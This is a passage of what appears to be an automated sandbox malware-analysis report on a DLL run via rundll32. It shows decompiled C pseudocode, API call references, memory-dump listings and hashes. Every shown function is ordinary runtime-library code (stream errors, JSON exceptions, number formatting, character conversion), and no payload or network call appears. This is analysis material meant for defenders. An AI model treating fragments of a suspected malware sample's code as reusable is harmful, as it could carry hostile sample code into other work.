                          0x6e258b1e
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b4c
                          0x6e258aff
                          0x6e258aff
                          0x6e258aff
                          0x6e258b59
                          0x6e258b5b
                          0x6e258b5f
                          0x6e258b6f
                          0x6e258b6f
                          0x6e258b61
                          0x6e258b61
                          0x6e258b64
                          0x00000000
                          0x6e258b66
                          0x6e258b66
                          0x6e258b67
                          0x6e258b6c
                          0x6e258b64
                          0x6e258b75
                          0x6e258b7f
                          0x6e258b8b

                          APIs
                          • _free.LIBCMT ref: 6E258B1F
                          • _free.LIBCMT ref: 6E258B75
                            • Part of subcall function 6E258951: _free.LIBCMT ref: 6E2589A9
                            • Part of subcall function 6E258951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                            • Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                            • Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID: 0!'n
                          • API String ID: 314583886-2553279824
                          • Opcode ID: 0b56662eb3f08cfb7a96f3ed6336703de2b06adc9c70305fabc973a387e0a5ee
                          • Instruction ID: 2d7148b183a6b827f0dbd635795aa4ac155bef34ca229043efccfa8fcf4cf7c1
                          • Opcode Fuzzy Hash: 0b56662eb3f08cfb7a96f3ed6336703de2b06adc9c70305fabc973a387e0a5ee
                          • Instruction Fuzzy Hash: DF217CB6C1421D9BDB2887A8CE44DDBB37FCB81720F1006A5D455E6340DBB04D90C5A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1E1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 40%
                          			E6E1E1EEA(void* __ecx, void* __edx, void* __esi, signed int _a4, char _a8) {
				char _v12;
				char _v32;
				signed int _t14;
				void* _t19;
				signed char _t24;
				void* _t27;
				char* _t31;

				_t27 = __edx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t24 =  *(__ecx + 0x10) & _t14;
				if(_t24 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t24 & 0x00000004) == 0) {
							_t31 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t31 = "ios_base::badbit set";
						}
						_t19 = E6E1E1CA2(_t24, _t27,  &_v12, 1);
						_t24 =  &_v32;
						E6E1E1EBD(_t24, _t31, _t19);
						_push(0x6e2c3568);
						_push( &_v32);
					}
					E6E223D74();
					asm("int3");
					return  *((intOrPtr*)(_t24 + 0xc));
				}
			}










                          0x6e1e1eea
                          0x6e1e1ef3
                          0x6e1e1ef6
                          0x6e1e1efd
                          0x6e1e1eff
                          0x6e1e1f47
                          0x6e1e1f01
                          0x6e1e1f05
                          0x6e1e1f4a
                          0x6e1e1f4c
                          0x6e1e1f07
                          0x6e1e1f0a
                          0x6e1e1f20
                          0x6e1e1f0c
                          0x6e1e1f0c
                          0x6e1e1f0c
                          0x6e1e1f29
                          0x6e1e1f32
                          0x6e1e1f35
                          0x6e1e1f3a
                          0x6e1e1f42
                          0x6e1e1f42
                          0x6e1e1f4e
                          0x6e1e1f53
                          0x6e1e1f57
                          0x6e1e1f57

                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1E1F4E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 2005118841-1866435925
                          • Opcode ID: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
                          • Instruction ID: 6898c8c95af63bb64c1bd810da426ff31557d66aa9f6f58dc9a9725a31fc5930
                          • Opcode Fuzzy Hash: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
                          • Instruction Fuzzy Hash: 02F0F4B2E446192FDF54DBD8C802FDA73A96B14314F208845F951AB582EB75A889C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          C-Code - Quality: 91%
                          			E6E20407D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t33;

				E6E2200AC(0x6e26808e, __ebx, __edi, __esi, 8);
				_t30 = __ecx;
				 *((intOrPtr*)(_t33 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t33 - 4)) = 0;
				 *((intOrPtr*)(_t33 - 0x10)) = 1;
				E6E205192(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + 0x10)) + E6E241D60("[json.exception."));
				E6E202D14(_t30, "[json.exception.", E6E241D60("[json.exception."));
				E6E201F57( *((intOrPtr*)(_t33 + 8)));
				return E6E220075(_t30);
			}





                          0x6e204084
                          0x6e204089
                          0x6e20408b
                          0x6e204090
                          0x6e204093
                          0x6e204096
                          0x6e20409d
                          0x6e2040a4
                          0x6e2040a8
                          0x6e2040c0
                          0x6e2040d0
                          0x6e2040d8
                          0x6e2040e4

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strlen$H_prolog3
                          • String ID: [json.exception.
                          • API String ID: 2883720156-791563284
                          • Opcode ID: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
                          • Instruction ID: ed24d3b07345910740ac1649ea3544e7153a155586584edc6b9706bbbf42f53f
                          • Opcode Fuzzy Hash: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
                          • Instruction Fuzzy Hash: 64F036B5600219AFDB189FB8C8506FEB6EFBF44708F540919E409DB281DBB45D548791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24F345, Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E6E24F345(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6E231F60(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6E2675C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6E2675C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6E2239C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6E2675C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6E267640();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6E267640();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6E267640();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6E24F648(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6E2678B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6E242281();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6E24215B();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                          0x6e24f345
                          0x6e24f350
                          0x6e24f357
                          0x6e24f359
                          0x6e24f359
                          0x6e24f35b
                          0x6e24f364
                          0x6e24f366
                          0x6e24f36b
                          0x6e24f371
                          0x6e24f387
                          0x6e24f38c
                          0x6e24f38f
                          0x6e24f39c
                          0x6e24f3a1
                          0x6e24f3f5
                          0x6e24f3fd
                          0x6e24f3ff
                          0x6e24f401
                          0x6e24f404
                          0x6e24f404
                          0x6e24f404
                          0x6e24f40a
                          0x6e24f412
                          0x6e24f425
                          0x6e24f428
                          0x6e24f42a
                          0x6e24f42d
                          0x6e24f42e
                          0x6e24f44f
                          0x6e24f452
                          0x6e24f452
                          0x6e24f430
                          0x6e24f430
                          0x6e24f432
                          0x6e24f43d
                          0x6e24f43d
                          0x6e24f43f
                          0x6e24f446
                          0x6e24f441
                          0x6e24f441
                          0x6e24f441
                          0x6e24f43f
                          0x6e24f453
                          0x6e24f455
                          0x6e24f456
                          0x6e24f459
                          0x6e24f45b
                          0x6e24f465
                          0x6e24f46f
                          0x6e24f45d
                          0x6e24f45d
                          0x6e24f45d
                          0x6e24f474
                          0x6e24f474
                          0x6e24f479
                          0x6e24f47c
                          0x6e24f487
                          0x6e24f487
                          0x6e24f487
                          0x6e24f487
                          0x6e24f48b
                          0x6e24f492
                          0x6e24f493
                          0x6e24f496
                          0x6e24f499
                          0x6e24f499
                          0x6e24f49b
                          0x00000000
                          0x00000000
                          0x6e24f4b3
                          0x6e24f4ba
                          0x6e24f4be
                          0x6e24f4c1
                          0x6e24f4c4
                          0x6e24f4c6
                          0x6e24f4c6
                          0x6e24f4c6
                          0x6e24f4c8
                          0x6e24f4cb
                          0x6e24f4ce
                          0x6e24f4d0
                          0x6e24f4d8
                          0x6e24f4de
                          0x6e24f4e1
                          0x6e24f4e4
                          0x6e24f4e5
                          0x6e24f4e8
                          0x6e24f4eb
                          0x6e24f4eb
                          0x6e24f4f0
                          0x6e24f4f3
                          0x00000000
                          0x00000000
                          0x6e24f50b
                          0x6e24f510
                          0x6e24f514
                          0x00000000
                          0x00000000
                          0x6e24f518
                          0x6e24f51b
                          0x6e24f51c
                          0x6e24f51c
                          0x6e24f51e
                          0x6e24f521
                          0x00000000
                          0x00000000
                          0x6e24f523
                          0x6e24f526
                          0x6e24f52d
                          0x6e24f530
                          0x6e24f533
                          0x6e24f549
                          0x6e24f549
                          0x6e24f549
                          0x6e24f535
                          0x6e24f535
                          0x6e24f537
                          0x6e24f53a
                          0x6e24f545
                          0x6e24f53c
                          0x6e24f53f
                          0x6e24f53f
                          0x6e24f53a
                          0x00000000
                          0x6e24f533
                          0x6e24f528
                          0x6e24f528
                          0x6e24f52a
                          0x6e24f52a
                          0x6e24f47e
                          0x6e24f47e
                          0x6e24f481
                          0x6e24f54c
                          0x6e24f54c
                          0x6e24f54e
                          0x6e24f550
                          0x6e24f553
                          0x6e24f554
                          0x6e24f555
                          0x6e24f556
                          0x6e24f55e
                          0x6e24f55e
                          0x6e24f55e
                          0x6e24f560
                          0x6e24f563
                          0x6e24f566
                          0x6e24f568
                          0x6e24f568
                          0x6e24f56a
                          0x6e24f57c
                          0x6e24f580
                          0x6e24f583
                          0x6e24f58a
                          0x6e24f592
                          0x6e24f592
                          0x6e24f595
                          0x6e24f597
                          0x6e24f5a8
                          0x6e24f5a8
                          0x6e24f5ac
                          0x6e24f5ac
                          0x6e24f5af
                          0x6e24f5b1
                          0x6e24f5b4
                          0x00000000
                          0x6e24f599
                          0x6e24f599
                          0x6e24f59f
                          0x6e24f59f
                          0x6e24f5a3
                          0x6e24f5b6
                          0x6e24f5b6
                          0x6e24f5ba
                          0x6e24f5bb
                          0x6e24f5bd
                          0x6e24f5bf
                          0x6e24f600
                          0x6e24f600
                          0x6e24f602
                          0x6e24f60f
                          0x6e24f60f
                          0x6e24f611
                          0x6e24f613
                          0x6e24f614
                          0x6e24f615
                          0x6e24f61c
                          0x6e24f61f
                          0x6e24f621
                          0x6e24f621
                          0x6e24f622
                          0x6e24f624
                          0x6e24f627
                          0x6e24f627
                          0x6e24f629
                          0x6e24f62b
                          0x00000000
                          0x6e24f62b
                          0x6e24f604
                          0x6e24f606
                          0x00000000
                          0x00000000
                          0x6e24f608
                          0x00000000
                          0x00000000
                          0x6e24f60a
                          0x6e24f60d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f60d
                          0x6e24f5c6
                          0x6e24f5cc
                          0x6e24f5cc
                          0x6e24f5ce
                          0x6e24f5cf
                          0x6e24f5d0
                          0x6e24f5d1
                          0x6e24f5d8
                          0x6e24f5db
                          0x6e24f5dd
                          0x6e24f5de
                          0x6e24f5e0
                          0x6e24f5ed
                          0x6e24f5ed
                          0x6e24f5ef
                          0x6e24f5f1
                          0x6e24f5f2
                          0x6e24f5f3
                          0x6e24f5fa
                          0x6e24f5fd
                          0x6e24f5ff
                          0x6e24f5ff
                          0x00000000
                          0x6e24f5ff
                          0x6e24f5e2
                          0x6e24f5e2
                          0x6e24f5e4
                          0x00000000
                          0x00000000
                          0x6e24f5e6
                          0x00000000
                          0x00000000
                          0x6e24f5e8
                          0x6e24f5eb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f5eb
                          0x6e24f5c8
                          0x6e24f5ca
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f5ca
                          0x6e24f59b
                          0x6e24f59d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f59d
                          0x6e24f597
                          0x00000000
                          0x6e24f481
                          0x6e24f47c
                          0x6e24f3a3
                          0x6e24f3a5
                          0x00000000
                          0x6e24f3a7
                          0x6e24f3bd
                          0x6e24f3c2
                          0x6e24f3c4
                          0x6e24f3d0
                          0x6e24f3d6
                          0x6e24f3d7
                          0x6e24f3d9
                          0x6e24f3db
                          0x6e24f3e6
                          0x6e24f3e6
                          0x6e24f3e9
                          0x6e24f3eb
                          0x6e24f3eb
                          0x6e24f3ee
                          0x6e24f3c6
                          0x6e24f3c6
                          0x6e24f3c6
                          0x00000000
                          0x6e24f3c4
                          0x6e24f373
                          0x6e24f373
                          0x6e24f37a
                          0x6e24f37b
                          0x6e24f37d
                          0x6e24f62f
                          0x6e24f633
                          0x6e24f638
                          0x6e24f638
                          0x6e24f647
                          0x6e24f647

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
                          • Instruction ID: 07e65a92fcb1d6d644c436182b844975bdb8764f7259a11deebbd27491fcd912
                          • Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
                          • Instruction Fuzzy Hash: 3EA1557691428FDFF719CFA8C890BABBBE6EF85314F2442ADD5949B280C7348941CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E256102, Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E6E256102(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_t34 =  *0x6e2c506c; // 0x8e829fa6
				_v8 = _t34 ^ _t69;
				E6E231F60(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6E21F8A5(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6E2239C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6E20DEE1(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6E24F26D(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6E2201B0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}





















                          0x6e256102
                          0x6e25610a
                          0x6e256111
                          0x6e25611d
                          0x6e256122
                          0x6e256127
                          0x6e25612c
                          0x6e25612c
                          0x6e25612f
                          0x6e256131
                          0x6e256131
                          0x6e256136
                          0x6e25614f
                          0x6e256155
                          0x6e25615a
                          0x6e2561f9
                          0x6e2561fd
                          0x6e256202
                          0x6e256202
                          0x6e25621e
                          0x6e25621e
                          0x6e256160
                          0x6e256163
                          0x6e256168
                          0x6e25616c
                          0x6e2561b8
                          0x6e2561ba
                          0x6e2561bc
                          0x6e2561c1
                          0x6e2561d8
                          0x6e2561e0
                          0x6e2561f0
                          0x6e2561f0
                          0x6e2561e0
                          0x6e2561f2
                          0x6e2561f3
                          0x00000000
                          0x6e2561f8
                          0x6e25616e
                          0x6e256173
                          0x6e256175
                          0x6e256177
                          0x6e256177
                          0x6e25617f
                          0x6e25619c
                          0x6e2561a6
                          0x6e2561ab
                          0x00000000
                          0x00000000
                          0x6e2561ad
                          0x6e2561b3
                          0x6e2561b3
                          0x00000000
                          0x6e2561b3
                          0x6e256183
                          0x6e256187
                          0x6e25618c
                          0x6e256190
                          0x00000000
                          0x00000000
                          0x6e256192
                          0x00000000

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E270EA8,00000000,00000000,008B018B,6E24DA1E,?,00000004,00000001,6E270EA8,0000007F,?,008B018B,00000001), ref: 6E25614F
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2561D8
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2561EA
                          • __freea.LIBCMT ref: 6E2561F3
                            • Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
